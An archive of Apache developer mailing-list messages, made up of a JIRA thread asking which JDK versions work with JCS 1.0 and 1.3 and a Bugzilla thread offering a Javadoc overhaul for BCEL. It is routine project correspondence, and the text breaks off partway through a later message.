e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 12:12:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14990 invoked from network); 28 Jul 2009 12:12:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 12:12:20 -0000 Received: (qmail 31179 invoked by uid 500); 28 Jul 2009 12:13:37 -0000 Delivered-To: [email protected] Received: (qmail 31112 invoked by uid 500); 28 Jul 2009 12:13:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 31102 invoked by uid 99); 28 Jul 2009 12:13:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:13:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:13:34 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CCEC7234C044 for <[email protected]>; Tue, 28 Jul 2009 05:13:14 -0700 (PDT) Message-ID: <1110502471.1248783194827.JavaMail.jira@brutus> Date: Tue, 28 Jul 2009 05:13:14 -0700 (PDT) From: "senthilmohan (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (JCS-64) Clarification on JCS compatibility nature with JDK In-Reply-To: <1979731257.1248756495662.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-64?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] senthilmohan updated JCS-64: ---------------------------- Priority: Critical (was: Major) > Clarification on JCS compatibility nature with JDK > --------------------------------------------------- > > Key: JCS-64 > URL: https://issues.apache.org/jira/browse/JCS-64 > Project: JCS > Issue Type: Question > Affects Versions: jcs-1.3 > Environment: Solaris platform with JDK 1.4.2_19 > Reporter: senthilmohan > Assignee: Aaron Smuts > Priority: Critical > Original Estimate: 24h > Remaining Estimate: 24h > > Hi , > We have an application which uses JCS1.0.Our application is in > JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify > below few things regarding this JCS compatibility nature. > 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported > with this combination? > 2. What is the compatible JDK version for JCS 1.3 ? > 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. > Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 12:50:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40046 invoked from network); 28 Jul 2009 12:50:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 12:50:20 -0000 Received: (qmail 85968 invoked by uid 500); 28 Jul 2009 12:51:37 -0000 Delivered-To: [email protected] Received: (qmail 85906 invoked by uid 500); 28 Jul 2009 12:51:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 85896 invoked by uid 99); 28 Jul 2009 12:51:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:51:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:51:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F184C234C044 for <[email protected]>; Tue, 28 Jul 2009 05:51:14 -0700 (PDT) Message-ID: <+1-743-284-3994.1248785474984.JavaMail.jira@brutus> Date: Tue, 28 Jul 2009 05:51:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JCS-64) Clarification on JCS compatibility nature with JDK In-Reply-To: <1979731257.1248756495662.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-64?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12736054#action_12736054 ] Aaron Smuts commented on JCS-64: -------------------------------- JCS 1.3.0 is compatible with JDK's 1.3 and up. I recommend using the latest RC build jcs-161.129.204.104-RC. It's compiled under JDK 1.4.2. This tempbuilds have many bug fixes and feature enhancements. > Clarification on JCS compatibility nature with JDK > --------------------------------------------------- > > Key: JCS-64 > URL: https://issues.apache.org/jira/browse/JCS-64 > Project: JCS > Issue Type: Question > Affects Versions: jcs-1.3 > Environment: Solaris platform with JDK 1.4.2_19 > Reporter: senthilmohan > Assignee: Aaron Smuts > Priority: Critical > Original Estimate: 24h > Remaining Estimate: 24h > > Hi , > We have an application which uses JCS1.0.Our application is in > JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify > below few things regarding this JCS compatibility nature. > 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported > with this combination? > 2. What is the compatible JDK version for JCS 1.3 ? > 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. > Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 12:50:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40069 invoked from network); 28 Jul 2009 12:50:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 12:50:20 -0000 Received: (qmail 86052 invoked by uid 500); 28 Jul 2009 12:51:37 -0000 Delivered-To: [email protected] Received: (qmail 86006 invoked by uid 500); 28 Jul 2009 12:51:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 85908 invoked by uid 99); 28 Jul 2009 12:51:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:51:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:51:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 24C83234C056 for <[email protected]>; Tue, 28 Jul 2009 05:51:15 -0700 (PDT) Message-ID: <230428913.1248785475149.JavaMail.jira@brutus> Date: Tue, 28 Jul 2009 05:51:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-64) Clarification on JCS compatibility nature with JDK In-Reply-To: <1979731257.1248756495662.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-64?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-64. -------------------------- > Clarification on JCS compatibility nature with JDK > --------------------------------------------------- > > Key: JCS-64 > URL: https://issues.apache.org/jira/browse/JCS-64 > Project: JCS > Issue Type: Question > Affects Versions: jcs-1.3 > Environment: Solaris platform with JDK 1.4.2_19 > Reporter: senthilmohan > Assignee: Aaron Smuts > Priority: Critical > Original Estimate: 24h > Remaining Estimate: 24h > > Hi , > We have an application which uses JCS1.0.Our application is in > JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify > below few things regarding this JCS compatibility nature. > 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported > with this combination? > 2. What is the compatible JDK version for JCS 1.3 ? > 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. > Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 12:50:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40090 invoked from network); 28 Jul 2009 12:50:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 12:50:22 -0000 Received: (qmail 86143 invoked by uid 500); 28 Jul 2009 12:51:39 -0000 Delivered-To: [email protected] Received: (qmail 86113 invoked by uid 500); 28 Jul 2009 12:51:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 86103 invoked by uid 99); 28 Jul 2009 12:51:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:51:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 12:51:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1FE7A234C051 for <[email protected]>; Tue, 28 Jul 2009 05:51:15 -0700 (PDT) Message-ID: <1744024304.1248785475129.JavaMail.jira@brutus> Date: Tue, 28 Jul 2009 05:51:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (JCS-64) Clarification on JCS compatibility nature with JDK In-Reply-To: <1979731257.1248756495662.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-64?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts resolved JCS-64. ---------------------------- Resolution: Fixed > Clarification on JCS compatibility nature with JDK > --------------------------------------------------- > > Key: JCS-64 > URL: https://issues.apache.org/jira/browse/JCS-64 > Project: JCS > Issue Type: Question > Affects Versions: jcs-1.3 > Environment: Solaris platform with JDK 1.4.2_19 > Reporter: senthilmohan > Assignee: Aaron Smuts > Priority: Critical > Original Estimate: 24h > Remaining Estimate: 24h > > Hi , > We have an application which uses JCS1.0.Our application is in > JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify > below few things regarding this JCS compatibility nature. > 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported > with this combination? > 2. What is the compatible JDK version for JCS 1.3 ? > 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. > Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 13:30:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70466 invoked from network); 28 Jul 2009 13:30:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 13:30:20 -0000 Received: (qmail 66877 invoked by uid 500); 28 Jul 2009 13:31:37 -0000 Delivered-To: [email protected] Received: (qmail 66847 invoked by uid 500); 28 Jul 2009 13:31:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 66835 invoked by uid 99); 28 Jul 2009 13:31:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 13:31:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 13:31:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 63215234C044 for <[email protected]>; Tue, 28 Jul 2009 06:31:15 -0700 (PDT) Message-ID: <1282743095.1248787875391.JavaMail.jira@brutus> Date: Tue, 28 Jul 2009 06:31:15 -0700 (PDT) From: "senthilmohan (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JCS-64) Clarification on JCS compatibility nature with JDK In-Reply-To: <1979731257.1248756495662.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-64?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12736060#action_12736060 ] senthilmohan commented on JCS-64: --------------------------------- Hi Aaron, Thank you very much for your reply. Would it be any problem if we keep JCS1.0 with JDK1.4.2_19. Regards, Senthil. > Clarification on JCS compatibility nature with JDK > --------------------------------------------------- > > Key: JCS-64 > URL: https://issues.apache.org/jira/browse/JCS-64 > Project: JCS > Issue Type: Question > Affects Versions: jcs-1.3 > Environment: Solaris platform with JDK 1.4.2_19 > Reporter: senthilmohan > Assignee: Aaron Smuts > Priority: Critical > Original Estimate: 24h > Remaining Estimate: 24h > > Hi , > We have an application which uses JCS1.0.Our application is in > JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify > below few things regarding this JCS compatibility nature. > 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported > with this combination? > 2. What is the compatible JDK version for JCS 1.3 ? > 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. > Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 13:56:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85363 invoked from network); 28 Jul 2009 13:56:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 13:56:22 -0000 Received: (qmail 22766 invoked by uid 500); 28 Jul 2009 13:57:39 -0000 Delivered-To: [email protected] Received: (qmail 22729 invoked by uid 500); 28 Jul 2009 13:57:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 22719 invoked by uid 99); 28 Jul 2009 13:57:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 13:57:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 13:57:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E1477234C046 for <[email protected]>; Tue, 28 Jul 2009 06:57:14 -0700 (PDT) Message-ID: <1733295793.1248789434921.JavaMail.jira@brutus> Date: Tue, 28 Jul 2009 06:57:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JCS-64) Clarification on JCS compatibility nature with JDK In-Reply-To: <1979731257.1248756495662.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-64?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12736073#action_12736073 ] Aaron Smuts commented on JCS-64: -------------------------------- JDK's are almost completely backward compatible. I can't think of any problems. But you shouldn't use such an old version. There have been 5 years of bug fixes and improvements since the 1.0 temp build. > Clarification on JCS compatibility nature with JDK > --------------------------------------------------- > > Key: JCS-64 > URL: https://issues.apache.org/jira/browse/JCS-64 > Project: JCS > Issue Type: Question > Affects Versions: jcs-1.3 > Environment: Solaris platform with JDK 1.4.2_19 > Reporter: senthilmohan > Assignee: Aaron Smuts > Priority: Critical > Original Estimate: 24h > Remaining Estimate: 24h > > Hi , > We have an application which uses JCS1.0.Our application is in > JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify > below few things regarding this JCS compatibility nature. > 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported > with this combination? > 2. What is the compatible JDK version for JCS 1.3 ? > 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. > Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 28 14:33:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6335 invoked from network); 28 Jul 2009 14:33:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Jul 2009 14:33:21 -0000 Received: (qmail 91704 invoked by uid 500); 28 Jul 2009 14:34:39 -0000 Delivered-To: [email protected] Received: (qmail 91667 invoked by uid 500); 28 Jul 2009 14:34:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 91657 invoked by uid 99); 28 Jul 2009 14:34:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 14:34:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Jul 2009 14:34:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C2CF1234C044 for <[email protected]>; Tue, 28 Jul 2009 07:34:14 -0700 (PDT) Message-ID: <34565339.1248791654785.JavaMail.jira@brutus> Date: Tue, 28 Jul 2009 07:34:14 -0700 (PDT) From: "senthilmohan (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JCS-64) Clarification on JCS compatibility nature with JDK In-Reply-To: <1979731257.1248756495662.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-64?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12736087#action_12736087 ] senthilmohan commented on JCS-64: --------------------------------- Thank you Aaron for clarifying. Regards, Senthil. > Clarification on JCS compatibility nature with JDK > --------------------------------------------------- > > Key: JCS-64 > URL: https://issues.apache.org/jira/browse/JCS-64 > Project: JCS > Issue Type: Question > Affects Versions: jcs-1.3 > Environment: Solaris platform with JDK 1.4.2_19 > Reporter: senthilmohan > Assignee: Aaron Smuts > Priority: Critical > Original Estimate: 24h > Remaining Estimate: 24h > > Hi , > We have an application which uses JCS1.0.Our application is in > JDK1.4.2_19.We are planning to upgrade to JCS1.3.We would like to clarify > below few things regarding this JCS compatibility nature. > 1. Is JCS 1.0 compatible with JDK1.4.2_19?. any other issues anyone reported > with this combination? > 2. What is the compatible JDK version for JCS 1.3 ? > 3. Any recommendations that which JCS version to be used with JDK 1.4.2_19. > Thanks in advance. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Sun May 13 09:43:01 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50866 invoked from network); 13 May 2007 09:43:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 May 2007 09:43:00 -0000 Received: (qmail 39467 invoked by uid 500); 13 May 2007 09:43:07 -0000 Delivered-To: [email protected] Received: (qmail 39435 invoked by uid 500); 13 May 2007 09:43:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "BCEL Developers List" <bcel-dev.jakarta.apache.org> Reply-To: "BCEL Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 39424 invoked by uid 99); 13 May 2007 09:43:06 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 13 May 2007 02:43:06 -0700 X-ASF-Spam-Status: No, hits=-99.2 required=10.0 tests=ALL_TRUSTED,MAILTO_TO_SPAM_ADDR,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 13 May 2007 02:42:59 -0700 Received: by brutus.apache.org (Postfix, from userid 33) id 60B19714065; Sun, 13 May 2007 02:42:39 -0700 (PDT) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 42402] New: - Javadoc overhaul Message-ID: <[email protected]/bugzilla/> X-Bugzilla-Reason: AssignedTo Date: Sun, 13 May 2007 02:42:39 -0700 (PDT) X-Virus-Checked: Checked by ClamAV on apache.org DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=42402>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=42402 Summary: Javadoc overhaul Product: BCEL Version: 5.3 Platform: Other OS/Version: other Status: NEW Severity: enhancement Priority: P2 Component: Main AssignedTo: [email protected] ReportedBy: [email protected] I was using BCEL for a school project over the last few months and noticed that the Javadoc needs improvement in some areas. Having free time on my hands after the end of the project (and semester), I'm interested in doing a (likely large or multi-part) patch to flesh it out. Two questions: 1. Is anyone else working on this currently? 2. Which source code base should I work on? (My guess is http://svn.apache.org/repos/asf/jakarta/bcel/trunk/src/main) I'll be starting sometime in the next week. Family is visiting until Monday, so I'm not entirely sure when I'm free right now. Thanks. -Charlie -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon May 14 16:24:31 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74132 invoked from network); 14 May 2007 16:24:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 May 2007 16:24:30 -0000 Received: (qmail 97351 invoked by uid 500); 14 May 2007 16:24:36 -0000 Delivered-To: [email protected] Received: (qmail 97313 invoked by uid 500); 14 May 2007 16:24:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "BCEL Developers List" <bcel-dev.jakarta.apache.org> Reply-To: "BCEL Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 97301 invoked by uid 99); 14 May 2007 16:24:36 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 May 2007 09:24:36 -0700 X-ASF-Spam-Status: No, hits=-99.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 14 May 2007 09:24:29 -0700 Received: by brutus.apache.org (Postfix, from userid 33) id 83522714043; Mon, 14 May 2007 09:24:08 -0700 (PDT) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 42402] - Javadoc overhaul In-Reply-To: <[email protected]/bugzilla/> X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Mon, 14 May 2007 09:24:08 -0700 (PDT) X-Virus-Checked: Checked by ClamAV on apache.org DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=42402>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=42402 ------- Additional Comments From [email protected] 2007-05-14 09:24 ------- Charlie, your help would surely be appreciated. Trunk would be the right place for it. Cheers, Torsten -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed May 16 19:03:09 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99470 invoked from network); 16 May 2007 19:03:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 May 2007 19:03:09 -0000 Received: (qmail 42049 invoked by uid 500); 16 May 2007 19:03:09 -0000 Delivered-To: [email protected] Received: (qmail 42016 invoked by uid 500); 16 May 2007 19:03:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "BCEL Developers List" <bcel-dev.jakarta.apache.org> Reply-To: "BCEL Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 41966 invoked by uid 99); 16 May 2007 19:03:08 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 May 2007 12:03:08 -0700 X-ASF-Spam-Status: No, hits=-99.2 required=10.0 tests=ALL_TRUSTED,MAILTO_TO_SPAM_ADDR,NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 16 May 2007 12:03:01 -0700 Received: by brutus.apache.org (Postfix, from userid 33) id 21AE971406F; Wed, 16 May 2007 12:02:40 -0700 (PDT) From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 42402] - Javadoc overhaul In-Reply-To: <[email protected]/bugzilla/> X-Bugzilla-Reason: AssignedTo Message-Id: <[email protected]> Date: Wed, 16 May 2007 12:02:40 -0700 (PDT) X-Virus-Checked: Checked by ClamAV on apache.org DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=42402>. ANY REPLY MADE TO THIS MESSAGE WILL 